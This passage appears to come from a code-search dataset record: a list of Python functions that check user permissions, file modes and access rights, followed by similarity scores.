kwargs['return_403'] = True\n return permission_required(perm, *args, **kwargs)", "def isfile_strict(path):\r\n try:\r\n st = os.stat(path)\r\n except OSError:\r\n err = 
sys.exc_info()[1]\r\n if err.errno in (errno.EPERM, errno.EACCES):\r\n raise\r\n return False\r\n else:\r\n return stat.S_ISREG(st.st_mode)", "def get_permissions(self):\n\t\treturn call_sdk_function('PrlFsEntry_GetPermissions', self.handle)", "def check_request_write_permission(callback=None):\n had_permission = check_write_permission()\n if not had_permission:\n from android.permissions import Permission, request_permissions\n permissions = [Permission.WRITE_EXTERNAL_STORAGE]\n request_permissions(permissions, callback)\n return had_permission", "def any_permission_required(*args):\n def test_func(user):\n for perm in args:\n if user.has_perm(perm):\n return True\n return False\n return user_passes_test(test_func)", "def get_permissions(filepath):\n return oct(stat.S_IMODE(os.lstat(filepath).st_mode))", "def is_permission_err(exc):\n assert isinstance(exc, OSError), exc\n # On Python 2 OSError doesn't always have 'winerror'. Sometimes\n # it does, in which case the original exception was WindowsError\n # (which is a subclass of OSError).\n return exc.errno in (errno.EPERM, errno.EACCES) or \\\n getattr(exc, \"winerror\", -1) in (cext.ERROR_ACCESS_DENIED,\n cext.ERROR_PRIVILEGE_NOT_HELD)", "def _check_conditions_permissions(user, permissions, course_id, **kwargs):\r\n\r\n def test(user, per, operator=\"or\"):\r\n if isinstance(per, basestring):\r\n if per in CONDITIONS:\r\n return _check_condition(user, per, course_id, kwargs)\r\n return cached_has_permission(user, per, course_id=course_id)\r\n elif isinstance(per, list) and operator in [\"and\", \"or\"]:\r\n results = [test(user, x, operator=\"and\") for x in per]\r\n if operator == \"or\":\r\n return True in results\r\n elif operator == \"and\":\r\n return not False in results\r\n return test(user, permissions, operator=\"or\")", "def testChAttrs(self):\n def _check(results):\n self.flushLoggedErrors()\n self.assertTrue(results[0].startswith(b'-rw-r--r--'))\n self.assertEqual(results[1], b'')\n self.assertTrue(results[2].startswith(b'----------'), results[2])\n self.assertEqual(results[3], b'')\n\n d = self.runScript('ls -l testfile1', 'chmod 0 testfile1',\n 'ls -l testfile1', 'chmod 644 testfile1')\n return d.addCallback(_check)\n # XXX test chgrp/own", "async def check_permissions(self, ctx, channel: typing.Optional[typing.Union[discord.TextChannel, discord.VoiceChannel]] = None, *, target: typing.Union[discord.Member, discord.Role] = None):\n if target == None:\n target = ctx.author\n if isinstance(target, discord.Member):\n if channel == None:\n perms = target.guild_permissions\n else:\n perms = channel.permissions_for(target)\n col = target.color\n avatar = await self.bot.user_avatar_as(target, size=256)\n name = str(target)\n elif isinstance(target, discord.Role):\n perms = target.permissions\n if channel != None:\n perms.update(\n **{x[0]: x[1] for x in channel.overwrites_for(ctx.guild.default_role) if x[1] != None})\n perms.update(**{x[0]: x[1] for x in channel.overwrites_for(target) if x[1] != None})\n col = target.color\n avatar = ctx.guild.icon_url_as(format='png', size=256)\n name = str(target)\n permsl = list()\n # Get the perms translations\n\n # if perms[\"\"]\n if perms.administrator:\n # If the user is admin, we just say it\n if \"administrator\" in perms_translations.keys():\n perm = perms_translations[\"administrator\"]\n else:\n perm = \"Administrator\"\n permsl.append(\":white_check_mark:\" + perm)\n else:\n # Here we check if the value of each permission is True.\n for perm, value in perms:\n if (perm not in 
self.perms_name['text']+self.perms_name['common_channel'] and isinstance(channel, discord.TextChannel)) or (perm not in self.perms_name['voice']+self.perms_name['common_channel'] and isinstance(channel, discord.VoiceChannel)):\n continue\n #perm = perm.replace('_',' ').title()\n if perm in perms_translations.keys():\n perm = perms_translations[perm]\n else:\n perm = perm.replace('_', ' ').title()\n if value:\n permsl.append(\":white_check_mark:\" + perm)\n else:\n permsl.append(\":x:\" + perm)\n if ctx.channel.permissions_for(ctx.guild.me).embed_links:\n # \\uFEFF is a Zero-Width Space, which basically allows us to have an empty field name.\n # And to make it look nice, we wrap it in an Embed.\n desc = \"Permissions générales\" if channel is None else channel.mention\n embed = discord.Embed(color=col, description=desc)\n embed.set_author(name=name, icon_url=avatar)\n if len(permsl) > 10:\n sep = int(len(permsl)/2)\n if len(permsl) % 2 == 1:\n sep += 1\n embed.add_field(name='\\uFEFF', value=\"\\n\".join(permsl[:sep]))\n embed.add_field(name='\\uFEFF', value=\"\\n\".join(permsl[sep:]))\n else:\n embed.add_field(name='\\uFEFF', value=\"\\n\".join(permsl))\n await ctx.send(embed=embed)\n # Thanks to Gio for the Command.\n else:\n try:\n await ctx.send(\"**Permission de '{}' :**\\n\\n\".format(name.replace('@', '')) + \"\\n\".join(permsl))\n except:\n pass", "def is_insufficient_permissions(self):\n return self._tag == 'insufficient_permissions'", "def check_request_write_permission():\n had_permission = check_write_permission()\n if not had_permission:\n from android.permissions import Permission, request_permission\n permission = Permission.WRITE_EXTERNAL_STORAGE\n request_permission(permission)\n return had_permission", "def check_package_list_file(package_list_path, *args, **kwargs):\n logger.debug(\"Checking file status\")\n path_exists = path.exists(package_list_path)\n path_is_dir = path.isdir(package_list_path)\n\n logger.debug(\"File status found, returning value\")\n if not path_exists:\n return 1\n elif path_exists and path_is_dir:\n return 2\n else:\n return 3", "def has_repo_file_privilege(login, repo_base, repo, privilege):\n repo = repo.lower()\n repo_base = repo_base.lower()\n\n # Users always have privileges over their own files.\n if login == repo_base:\n return\n\n # Check if the current user or the public user has the privilege on\n # this repo.\n # The anonymous user is never explicitly shared with, so we don't need\n # to check for that.\n permitted_collaborators = Collaborator.objects.filter(\n repo_base=repo_base,\n repo_name=repo,\n file_permission__contains=privilege,\n user__username__in=[settings.PUBLIC_ROLE, login])\n if not next((c for c in permitted_collaborators), None):\n raise PermissionDenied()", "def _check_permission_recursive(self, coll_path, perm_subject, permission):\n if permission == \"null\":\n raise ValueError(\"permission cannot be null, use other functions instead\")\n query = self.session.query(User.id).filter(User.name == perm_subject)\n perm_subj_id = query.first()[User.id]\n\n # find all related collections (including self)\n coll_obj_query = self.session.query(CollectionAccess.access_id).filter(\n Criterion('like', Collection.name, '{}%'.format(coll_path)))\n coll_count = len(coll_obj_query.execute())\n\n # find all related collection that has correct permission\n coll_obj_query = self.session.query(CollectionAccess.access_id).filter(\n Criterion('like', Collection.name, '{}%'.format(coll_path)))\n coll_obj_query = coll_obj_query.filter(\n 
CollectionAccess.name == self.perm_str_reverse_map[permission])\n coll_obj_query = coll_obj_query.filter(\n CollectionAccess.user_id == perm_subj_id)\n correct_colls_count = len(\n [row[CollectionAccess.access_id] for row in coll_obj_query]\n )\n if correct_colls_count != coll_count:\n return False\n\n # check permission for members of all related collections\n data_obj_query = self.session.query(DataAccess.data_id).filter(\n Criterion('like', Collection.name, '{}%'.format(coll_path)))\n data_obj_count = len(data_obj_query.execute())\n\n data_obj_query = self.session.query(DataAccess.data_id).filter(\n Criterion('like', Collection.name, '{}%'.format(coll_path)))\n data_obj_query = data_obj_query.filter(\n DataAccess.user_id == perm_subj_id)\n data_obj_query = data_obj_query.filter(\n DataAccess.name == self.perm_str_reverse_map[permission])\n correct_data_obj_count = len(data_obj_query.execute())\n\n if data_obj_count != correct_data_obj_count:\n return False\n\n return True", "def check_dir_perms(path, dir_perm=stat.S_IWOTH, file_perm=stat.S_IWOTH, users=('root',), groups=('root',), recurse=True):\n directories = ((path, (), ()),) if not recurse else os.walk(path)\n for dir_name, sub_dirs, files in directories:\n attrib = os.stat(dir_name)\n if attrib.st_uid not in [pwd.getpwnam(user).pw_uid for user in users]:\n err_msg = 'Directory: \"{0}\" is owned by {1} which is not in the list of allowed users: \"{2!s}\"'\n raise PermError(err_msg.format(dir_name, pwd.getpwuid(attrib.st_uid).pw_name, users))\n\n if attrib.st_gid not in [grp.getgrnam(group).gr_gid for group in groups]:\n err_msg = 'The group for directory: \"{0}\" is {1} which is not in the list of allowed groups: \"{2!s}\"'\n raise PermError(err_msg.format(dir_name, grp.getgrgid(attrib.st_gid).gr_name, groups))\n\n if check_permission(attrib.st_mode, dir_perm):\n # Could add strmode for python one day and make nice human errors\n err_msg = 'The permissions on directory: \"{0}\" are \"{1!s}\" and violate restriction \"{2!s}\"'\n raise PermError(err_msg.format(dir_name, oct(attrib.st_mode), oct(dir_perm)))\n\n for f in files:\n file_attrib = os.stat(os.path.join(dir_name, f))\n if check_permission(file_attrib.st_mode, file_perm):\n # Could add strmode for python one day and make nice human errors\n err_msg = 'The permissions on file: \"{0}\" are \"{1!s}\" and violate restriction \"{2!s}\"'\n raise PermError(err_msg.format(os.path.join(dir_name, f), oct(file_attrib.st_mode), oct(file_perm)))", "def _check_permissions(server, priv):\n # Check user permissions\n user_pass_host = server.user\n if server.passwd is not None and len(server.passwd) > 0:\n user_pass_host += \":\" + server.passwd\n user_pass_host += \"@\" + server.host\n user = User(server, user_pass_host, False)\n if not user.has_privilege(\"*\", \"*\", priv):\n raise UtilError(\"Not enough permissions. 
The user must have the \"\n \"%s privilege.\" % priv)", "def file_mode_checks(value):\n if not value.endswith(F_SUFFIX):\n raise argparse.ArgumentTypeError(\n \"\\nFile resource must be:\\n\"\n + \" 1) Obfuscated {hex}.cache.js GWT permutation file\"\n )\n return value", "def verify_blob_permissions(self, blob):\n path = self.csum_to_path(blob)\n return is_readonly(path)", "def hasCustomPermissions( self, context, permission ):\n return CustomCheckPermission( context, permission )", "def test_file(path, mode, exception=RuntimeError, isdir=False):\n what = (\"directory\" if isdir else \"file\")\n if not os.access(path, os.F_OK):\n raise exception(\"Cannot access %s '%s'.\" % (what, path))\n if isdir and not os.path.isdir(path):\n raise exception(\n \"Expected '%s' to be a directory, but it's not.\" % path)\n if (mode & os.R_OK) and not os.access(path, os.R_OK):\n raise exception(\"Cannot read %s '%s'.\" % (what, path))\n if (mode & os.W_OK) and not os.access(path, os.W_OK):\n raise exception(\"Cannot write to %s '%s'.\" % (what, path))\n if (mode & os.X_OK) and not os.access(path, os.X_OK):\n if isdir:\n raise exception(\"Cannot traverse directory '%s':\"\n \" lacks 'x' permission.\" % path)\n else:\n raise exception(\"File '%s' lacks execute ('x') permission.\" % path)\n return True", "def check_reminders_permissions(handler_input):\n # type: (HandlerInput) -> Bool\n #check permissions for the Reminder\n permissions = [\"alexa::alerts:reminders:skill:readwrite\"]\n req_envelope = handler_input.request_envelope\n response_builder = handler_input.response_builder\n # Check if user gave permissions to create reminders.\n # If not, request to provide permissions to the skill.\n if not (req_envelope.context.system.user.permissions and\n req_envelope.context.system.user.permissions.consent_token):\n response_builder.speak(NOTIFY_MISSING_PERMISSIONS)\n response_builder.set_card(\n AskForPermissionsConsentCard(permissions=permissions))\n return False\n logger.info(\"Permissions are OK\")\n return True", "def test_extract_permission_docstring(self):\n for permission, expected_dict in [\n (\n PermissionA & PermissionB,\n {\n \"PermissionA\": \"Permission A.\",\n \"PermissionB\": \"Permission B.\",\n },\n ),\n (\n PermissionA | PermissionB,\n {\n \"PermissionA\": \"Permission A.\",\n \"PermissionB\": \"Permission B.\",\n },\n ),\n (\n ~PermissionA,\n {\n \"PermissionA\": \"Permission A.\",\n },\n ),\n (\n PermissionA,\n {\n \"PermissionA\": \"Permission A.\",\n },\n ),\n (\n (PermissionA & PermissionB) | ~PermissionA,\n {\n \"PermissionA\": \"Permission A.\",\n \"PermissionB\": \"Permission B.\",\n },\n ),\n (\n (PermissionA & PermissionB) | ~PermissionC,\n {\n \"PermissionA\": \"Permission A.\",\n \"PermissionB\": \"Permission B.\",\n \"PermissionC\": \"Permission C.\",\n },\n ),\n ]:\n with self.subTest(permission=permission):\n self.assertEqual(\n # mimic `get_permissions` by calling permission\n extract_permission_docstring(permission()),\n expected_dict,\n )", "def check(self, mode, values=None):\n res_ids = {}\n if self._ids:\n self._cr.execute(\n \"\"\"SELECT DISTINCT res_type, res_id FROM\n workflow_task WHERE id = ANY (%s)\"\"\", (list(self._ids),))\n for rmod, rid in self._cr.fetchall():\n res_ids.setdefault(rmod, set()).add(rid)\n if values:\n if values.get('res_type') and values.get('res_id'):\n res_ids.setdefault(values['res_type'], set())\\\n .add(values['res_id'])\n\n for model, mids in res_ids.items():\n existing_ids = self.pool[model].exists(self._cr, self._uid, mids)\n 
self.check_base_security(model, existing_ids, mode)\n if not self._uid == SUPERUSER_ID and\\\n not self.env['res.users'].has_group('base.group_user'):\n raise exceptions.AccessError(\n _(\"Sorry, you are not allowed to access this document.\"))", "def check_file_flag(file):\n return process_file_flag(file, None)", "def can(self, unused_perm):\n return False", "def get_file_perms(self,\n\t filename,\n\t shutit_pexpect_child=None,\n\t note=None,\n\t loglevel=logging.DEBUG):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tshutit_pexpect_child = shutit_pexpect_child or self.get_current_shutit_pexpect_session().pexpect_child\n\t\tshutit_pexpect_session = self.get_shutit_pexpect_session_from_child(shutit_pexpect_child)\n\t\treturn shutit_pexpect_session.get_file_perms(filename,note=note,loglevel=loglevel)", "def file_mode_checker(\n filename: str,\n mode: int = 0o600,\n quiet: bool = False,\n create: bool = False\n):\n try:\n st_mode = os.stat(filename).st_mode\n except OSError: # file does not exist\n if not create:\n raise\n os.close(os.open(filename, os.O_CREAT | os.O_EXCL, mode))\n return\n\n warn_str = 'File {0} had {1:o} mode; converted to {2:o} mode.'\n if stat.S_ISREG(st_mode) and (st_mode - stat.S_IFREG != mode):\n os.chmod(filename, mode)\n # re-read and check changes\n if os.stat(filename).st_mode != st_mode and not quiet:\n warn(warn_str.format(filename, st_mode - stat.S_IFREG, mode))", "def test_check_permissions(mock_list_permissions, mock_dry_permissions):\n view = views.ListEntryListView()\n\n view.check_permissions(None)\n\n assert mock_dry_permissions.call_count == 1\n assert mock_list_permissions.call_count == 1", "def puede_hacer(self, f_name):\n\n for perm in self.permissions:\n if (f_name) == perm.name:\n return True\n return False", "def _is_user_defined_permission(self, perm: Model) -> bool:\n\n return perm.permission.name in self.OBJECT_SPEC_PERMISSIONS", "def _check_r_res(res, o_exp, g_exp, p_exp):\n print green(\"Checking %s owner, group, permissions. \"\n \"Expected: %s, %s, %s\" % (res, o_exp, g_exp, p_exp))\n if exists(res):\n resp = run('stat -c %%U,%%G,%%a %s' % res)\n o_act, g_act, p_act = map(str.strip, resp.split(','))\n if o_act != o_exp or g_act != g_exp or p_act != p_exp:\n abort(red(\"Resource %s params: %s. 
Expected: %s\" % (\n res, (o_act, g_act, p_act), (o_exp, g_exp, p_exp))))\n print green(\"Resource %s checking passed\" % res)\n else:\n abort(red(\"Resource %s is not exists\" % res))", "def chmod_stat ( self, fspath, mode ):\n if stat.S_ISDIR ( mode ):\n return self.chmod_dir ( fspath )\n else:\n return self.chmod_file ( fspath )", "def test_permissions(self):\n \n from pages.permissions import PagePermission\n admin = User.objects.get(username='admin')\n page = self.new_page()\n pp = PagePermission(user=page.author)\n self.assertTrue(pp.check('change', page=page, method='GET'))\n self.assertTrue(pp.check('change', page=page, method='POST'))\n \n staff = User.objects.get(username='staff')\n pp = PagePermission(user=staff)\n # weird because nonstaff?\n self.assertTrue(pp.check('change', page=page, method='GET',\n lang='en-us'))\n self.assertFalse(pp.check('change', page=page, method='POST',\n lang='en-us'))\n\n self.assertFalse(pp.check('delete', page=page, method='POST',\n lang='en-us'))\n self.assertFalse(pp.check('add', page=page, method='POST',\n lang='en-us'))\n self.assertFalse(pp.check('freeze', page=page, method='POST',\n lang='en-us'))\n\n self.assertFalse(pp.check('doesnotexist', page=page, method='POST',\n lang='en-us'))", "def HasPerms(self, object, perms, verbose = 1) :\n\t\tif type(perms) != type([]) :\n\t\t\tperms = [perms]\n\t\tSecurityManager = AccessControl.getSecurityManager()\n\t\tfor perm in perms :\n\t\t\tif not SecurityManager.checkPermission(perm, object) :\n\t\t\t\tif verbose :\n\t\t\t\t\tself.permissionProblem(object, perm)\n\t\t\t\treturn 0\n\t\treturn 1", "def test_permission_list_ok(self):\n test_name = sys._getframe().f_code.co_name\n rv, output = self._execute('permission list')\n self.assertEqual(0, rv)\n self.assertEqual(self.expected_results[test_name], output)", "def oauth2_check_permissions(self, request, required_permissions,\n additional_permissions=None,\n fql_check=True, force_check=True):\n has_permissions = False\n\n req_perms = set(required_permissions.split(','))\n\n if 'oauth2_extended_permissions' in request.session:\n cached_perms = request.session['oauth2_extended_permissions']\n\n # so now, fb_sig_ext_perms seems to contain the right perms (!)\n\n if not force_check and cached_perms and req_perms.issubset(cached_perms):\n # Note that this has the potential to be out of date!\n has_permissions = True\n elif fql_check:\n # TODO allow option to use preload FQL for this?\n perms_query = required_permissions\n \n # Note that we can query additional permissions that we\n # don't require. 
This can be useful for optional\n # functionality (or simply for better caching)\n if additional_permissions:\n perms_query += ',' + additional_permissions\n \n perms_results = self.fql.query('select %s from permissions where uid=%s'\n % (perms_query, self.uid))[0]\n actual_perms = set()\n for permission, allowed in perms_results.items():\n if allowed == 1:\n actual_perms.add(permission)\n request.session['oauth2_extended_permissions'] = actual_perms\n has_permissions = req_perms.issubset(actual_perms)\n\n return has_permissions", "def checkExistanceOfFiles(imageFilename, maskFilename):\n\n if os.path.isfile(imageFilename) and os.path.isfile(maskFilename):\n return True\n\n return False", "def can_view_project_files(project, user):\n return can_access_project(project, user) and project.allow_file_downloads", "def has_necessary_permissions(perm_json, required_perms, all_required=True):\n\n # Make list if not required_perms is string\n if isinstance(required_perms, str) or isinstance(required_perms, unicode):\n list_perms = [required_perms]\n else:\n list_perms = required_perms\n\n # Loop and check presence\n is_permitted = True\n for perm_key in list_perms:\n is_present = lookup_permission(perm_json, perm_key)\n\n if all_required:\n # All required: AND operation\n is_permitted = is_permitted and is_present\n if not is_permitted:\n break\n else:\n # Atleast one required: OR operation\n is_permitted = is_permitted or is_present\n\n\n return is_permitted", "def can(self, permission_code_name):\n if permission_code_name in list(self.get_group_permissions().values_list('code_name', flat=True)):\n # match against group permissions first for common use case\n return True\n return permission_code_name in list(self.get_permissions().values_list('code_name', flat=True))", "def check_arguments(logger: logging.Logger = None):\n cFuncName = colored(os.path.basename(__file__), 'yellow') + ' - ' + colored(sys._getframe().f_code.co_name, 'green')\n\n # check & change working dir\n dStat['dir'] = os.path.dirname(Path(dStat['cli']['obsstatf']).resolve())\n dStat['obsstatf'] = os.path.basename(dStat['cli']['obsstatf'])\n\n if not amutils.changeDir(dStat['dir']):\n if logger is not None:\n logger.error('{func:s}: changing to directory {dir:s} failed'.format(dir=dStat['dir'], func=cFuncName))\n sys.exit(amc.E_DIR_NOT_EXIST)\n\n # check accessibilty of observation statistics file\n if not amutils.file_exists(fname=dStat['obsstatf'], logger=logger):\n if logger is not None:\n logger.error('{func:s}: observation file {file:s} not accessible'.format(file=dStat['obsstatf'], func=cFuncName))\n sys.exit(amc.E_FILE_NOT_EXIST)\n\n # create dir for storing the latex sections\n dStat['ltx']['path'] = os.path.join(dStat['dir'], 'ltx')\n if not amutils.mkdir_p(dStat['ltx']['path']):\n if logger is not None:\n logger.error('{func:s}: cannot create directory {dir:s} failed'.format(dir=dStat['ltx']['path'], func=cFuncName))\n sys.exit(amc.E_CREATE_DIR_ERROR)\n\n # check for accessibility of CVS database\n if not amutils.path_writable(os.path.dirname(dStat['cli']['cvsdb'])):\n if logger is not None:\n logger.error('{func:s}: cannot write to directory {dir:s} failed'.format(dir=colored(os.path.dirname(dStat['cli']['cvsdb']), 'red'), func=cFuncName))\n sys.exit(amc.E_PATH_NOT_WRITABLE)\n\n # check whether selected freq is available\n for clifreq in dStat['cli']['freqs']:\n if clifreq not in dStat['info']['freqs']:\n if logger is not None:\n logger.error('{func:s}: selected frequency {clifreq:s} is not 
available'.format(clifreq=colored(clifreq, 'red'), func=cFuncName))\n sys.exit(amc.E_NOAVAIL_FREQ)\n\n # extract YY and DOY from filename\n dStat['time']['YYYY'] = int(dStat['obsstatf'][12:16])\n dStat['time']['DOY'] = int(dStat['obsstatf'][16:19])\n # converting to date\n dStat['time']['date'] = datetime.strptime('{year:04d}-{doy:03d}'.format(year=dStat['time']['YYYY'], doy=dStat['time']['DOY']), \"%Y-%j\")", "def _require_owner_mod(self, path, owner, mode, must_exist=False):\n if not os.path.exists(path):\n if must_exist:\n self.logger.warning('\"%(path)s\" is required but not exist.' %\n {'path': path})\n return\n\n # get uid and file mode\n st = os.stat(path)\n uid = st.st_uid\n md = st.st_mode & 0777\n\n # log generator\n def make_log(rtype, require, current):\n self.logger.warning(\n '%(rtype)s of \"%(path)s\" is required to be %(require)s, '\n 'not %(current)s.' % {\n 'path': path,\n 'require': require,\n 'current': current,\n 'rtype': rtype\n })\n self.errcount += 1\n\n if uid != self._get_uid(owner):\n make_log('owner', owner, self._get_uname(uid))\n if md != mode:\n make_log('mode', oct(mode), oct(md))", "def check_permissions(user, actor_id, level):\n permissions = get_permissions(actor_id)\n for pem in permissions:\n if pem['user'] == user:\n if pem['level'] >= level:\n return True\n return False", "def has_permission(perm_json, perm_key):\n return lookup_permission(perm_json, perm_key)", "def test_files(*fns, test_nonzero=False, allow_pipes=False):\n\n for fn in fns:\n is_file = os.path.isfile(fn)\n is_pipe = pathlib.Path(fn).is_fifo()\n if allow_pipes:\n if not is_file or is_pipe:\n error('File \"{}\" does not exist.'.format(fn))\n else:\n if is_pipe:\n if not is_file:\n error('File \"{}\" is a process substitution or a device.'.format(fn))\n else:\n if not is_file:\n error('File \"{}\" does not exist.'.format(fn))\n\n if test_nonzero and not allow_pipes:\n if not file_sizes(fn)[0]:\n error('File \"{}\" has size 0.'.format(fn))", "def check_permission(\n owned_policies: PolicyContext, access_request: AccessRequest\n) -> Tuple[Scope, bool]:\n if access_request.operation == Permission.READ.value:\n scope = get_read_scope(owned_policies, access_request)\n return scope, len(scope) > 0\n return (\n [access_request.selector],\n is_write_allowed(owned_policies, access_request),\n )", "def check_action_permissions(self, request, action, obj=None):\n if action is None:\n self.permission_denied(request)\n\n for permission in self.get_permissions():\n if not permission.has_action_permission(request, self, action, obj):\n self.permission_denied(request)", "def test_has_perm_change(self):\n perm = \"change\"\n self.assertTrue(self.story.has_perm(self.user1, perm))\n self.assertFalse(self.story.has_perm(self.user2, perm))", "def check_filepat_valid(config, filepat, modname, objname, indent=''):\n\n cnts = [0] * NUMCNTS\n\n if pfwdefs.SW_FILEPATSECT not in config:\n error(indent, \"Missing filename pattern definition section (%s)\" % (pfwdefs.SW_FILEPATSECT))\n cnts[ERRCNT_POS] += 1\n elif filepat not in config[pfwdefs.SW_FILEPATSECT]:\n error(indent, \"module %s, %s - Missing definition for %s '%s'\" % (modname, objname, pfwdefs.SW_FILEPAT, filepat))\n cnts[ERRCNT_POS] += 1\n\n # todo: if pattern, check that all needed values exist\n\n return cnts", "def has_change_permissions_permission(self, request):\n return self.has_generic_permission(request, \"change_permissions\")", "def permissions_required(permissions):\n def decorator(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n 
if not current_user.can(permissions):\n abort(403)\n return f(*args,**kwargs)\n return decorated_function\n\n return decorator", "def is_valid_file_and_directory(args):\n if is_valid_file(args) and is_valid_directory(args):\n return True\n return False" ]
[ "0.7191872", "0.68649065", "0.67243284", "0.6699847", "0.6546892", "0.6490462", "0.6473374", "0.6473374", "0.6460848", "0.64598584", "0.6364402", "0.6364259", "0.636375", "0.6361546", "0.6326846", "0.6268052", "0.62131613", "0.6208553", "0.6181878", "0.6179629", "0.6141624", "0.6122187", "0.6108162", "0.61049557", "0.6080555", "0.59932023", "0.59867954", "0.59865963", "0.5964479", "0.59568936", "0.59521604", "0.5857885", "0.577289", "0.5772605", "0.57709223", "0.5745109", "0.57358205", "0.5721722", "0.5721722", "0.57132095", "0.57121634", "0.5703128", "0.56951874", "0.56932163", "0.56915873", "0.5675976", "0.56589526", "0.5654458", "0.5637782", "0.56368244", "0.563356", "0.5623745", "0.56125295", "0.5607823", "0.56032205", "0.55798995", "0.55654526", "0.5563646", "0.5562727", "0.5553925", "0.55445266", "0.5528213", "0.55235696", "0.5501901", "0.54805076", "0.5472259", "0.54647654", "0.545832", "0.54579157", "0.54570264", "0.54522103", "0.5450175", "0.5447379", "0.5441432", "0.5440074", "0.5431865", "0.5430852", "0.54290324", "0.54276556", "0.54167384", "0.5412284", "0.54113984", "0.5410523", "0.54088277", "0.5408539", "0.53980964", "0.539217", "0.53859836", "0.5383695", "0.5378563", "0.53781", "0.5375251", "0.53744334", "0.5373469", "0.53700376", "0.53523934", "0.534395", "0.5341597", "0.5340253", "0.53390384" ]
0.66519415
4
Function to change pick uncertainties based upon correlation values (saved in pick Comment). This works in place on the catalog.
def reweight_picks(cat):
    from obspy.core.event import QuantityError
    for ev in cat:
        for pk in ev.picks:
            if pk.phase_hint == 'P':
                ccval = float(pk.comments[0].text.split('=')[-1])
                # Re-weight based on some scheme (less down-weighting)
                if ccval > 0.3:
                    pk.time_errors = QuantityError(uncertainty=0.05)
    return cat
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def switch_cut_cor(self):\n if self.cut_cor == 41:\n self.cut_cor = 42\n elif self.cut_cor == 42:\n self.cut_cor = 41", "def change_mix_corr(self, \n q_values, lmax,\n new_corr,new_cospsi,\n **kwargs):\n PhaseRetriever.__init__(self,\n q_values, lmax, self.n_theta, self.n_phi,\n corr = new_corr, cospsi = new_cospsi,\n **kwargs)\n \n if self.normalize_cl:\n self.cl = self.norm_leg_coefs( self.cl )", "def reset_correlation(r2, polys, poly):\n \n polys[r2] = poly", "def _set_correlations(self) -> None:\n pass", "def correlations_cont_cat(self):\n \"\"\" Use ICC to define correlations, give box-plots for highly correlated pairs \"\"\"\n \n warnings.filterwarnings('ignore')\n \n # Print correlations and column names\n print('One-way ANOVA p-values - Predictors')\n for i,j,v in self.cont_cat_distance:\n print('{} and {} = {:.2}'.format(i,j,v))\n \n # Box plot of the highly correlated pairs\n for i,j,v in self.cont_cat_distance:\n fg,ax = plt.subplots(figsize=(12, 8))\n fg = self._dataset.boxplot(i, j, ax=ax, grid=False)\n plt.xticks(rotation=90)\n plt.show()", "def set_correlation(r1, r2, polys):\n \n poly_r2 = polys[r2]\n polys[r2] = polys[r1]\n return poly_r2", "def test_remove_autos_with_pols():\n test_array = np.ones((4, 3, 3, 11, 21))\n out_array = utils.remove_auto_correlations(test_array, axes=(1, 2))\n assert (4, 6, 11, 21) == out_array.shape", "def disableCorrelation( band=range(9,25) ) : \n enableCorrelation(band, False)", "def set_CriticsPick(self, value):\n super(SearchByReviewerInputSet, self)._set_input('CriticsPick', value)", "def uniformCrossover(self, cl):\n if cons.env.format_data.discrete_action: #Always crossover condition if the phenotype is discrete (if continuous phenotype, half the time phenotype crossover is performed instead)\n self_specified_atts = copy.deepcopy(self.specified_attributes)\n cl_specified_atts = copy.deepcopy(cl.specified_attributes)\n probability = 0.5 #Equal probability for attribute alleles to be exchanged.\n\n #Make list of attribute references appearing in at least one of the parents.-----------------------------\n combined_atts = []\n for i in self_specified_atts:\n combined_atts.append(i)\n for i in cl_specified_atts:\n if i not in combined_atts:\n combined_atts.append(i)\n elif not cons.env.format_data.attribute_info[i][0]: #Attribute specified in both parents, and the attribute is discrete (then no reason to cross over)\n combined_atts.remove(i)\n combined_atts.sort()\n #--------------------------------------------------------------------------------------------------------\n changed = False;\n for att in combined_atts: #Each condition specifies different attributes, so we need to go through all attributes in the dataset.\n att_info = cons.env.format_data.attribute_info[att]\n #-----------------------------\n ref = 0\n #if att in self.specified_attributes:\n if att in self_specified_atts:\n ref += 1\n #if att in cl.specified_attributes:\n if att in cl_specified_atts:\n ref += 1\n #-----------------------------\n\n if ref == 0: #Attribute not specified in either condition (Attribute type makes no difference)\n print(\"Error: UniformCrossover!\")\n pass\n\n elif ref == 1: #Attribute specified in only one condition - do probabilistic switch of whole attribute state (Attribute type makes no difference)\n if att in self_specified_atts and random.random() > probability:\n i = self.specified_attributes.index(att) #reference to the position of the attribute in the rule representation\n cl.condition.append(self.condition.pop(i)) #Take attribute from 
self and add to cl\n cl.specified_attributes.append(att)\n self.specified_attributes.remove(att)\n changed = True #Remove att from self and add to cl\n\n\n if att in cl_specified_atts and random.random() < probability:\n i = cl.specified_attributes.index(att) #reference to the position of the attribute in the rule representation\n self.condition.append(cl.condition.pop(i)) #Take attribute from self and add to cl\n self.specified_attributes.append(att)\n cl.specified_attributes.remove(att)\n changed = True #Remove att from cl and add to self.\n\n\n else: #Attribute specified in both conditions - do random crossover between state alleles. The same attribute may be specified at different positions within either classifier\n #-------------------------------------------------------\n # CONTINUOUS ATTRIBUTE\n #-------------------------------------------------------\n if att_info[0]:\n i_cl1 = self.specified_attributes.index(att) #pairs with self (classifier 1)\n i_cl2 = cl.specified_attributes.index(att) #pairs with cl (classifier 2)\n tmp_key = random.randint(0,3) #Make random choice between 4 scenarios, Swap minimums, Swap maximums, Self absorbs cl, or cl absorbs self.\n if tmp_key == 0: #Swap minimum\n temp = self.condition[i_cl1][0]\n self.condition[i_cl1][0] = cl.condition[i_cl2][0]\n cl.condition[i_cl2][0] = temp\n elif tmp_key == 1: #Swap maximum\n temp = self.condition[i_cl1][1]\n self.condition[i_cl1][1] = cl.condition[i_cl2][1]\n cl.condition[i_cl2][1] = temp\n else: #absorb range\n all_list = self.condition[i_cl1] + cl.condition[i_cl2]\n new_min = min(all_list)\n new_max = max(all_list)\n if tmp_key == 2: #self absorbs cl\n self.condition[i_cl1] = [new_min,new_max]\n #Remove cl\n cl.condition.pop(i_cl2)\n cl.specified_attributes.remove(att)\n else: #cl absorbs self\n cl.condition[i_cl2] = [new_min,new_max]\n #Remove self\n self.condition.pop(i_cl1)\n self.specified_attributes.remove(att)\n #-------------------------------------------------------\n # DISCRETE ATTRIBUTE\n #-------------------------------------------------------\n else:\n pass\n tmp_list1 = copy.deepcopy(self_specified_atts)\n tmp_list2 = copy.deepcopy(cl.specified_attributes)\n tmp_list1.sort()\n tmp_list2.sort()\n if changed and (tmp_list1 == tmp_list2):\n changed = False\n\n if self.action != cl.action and random.random() > 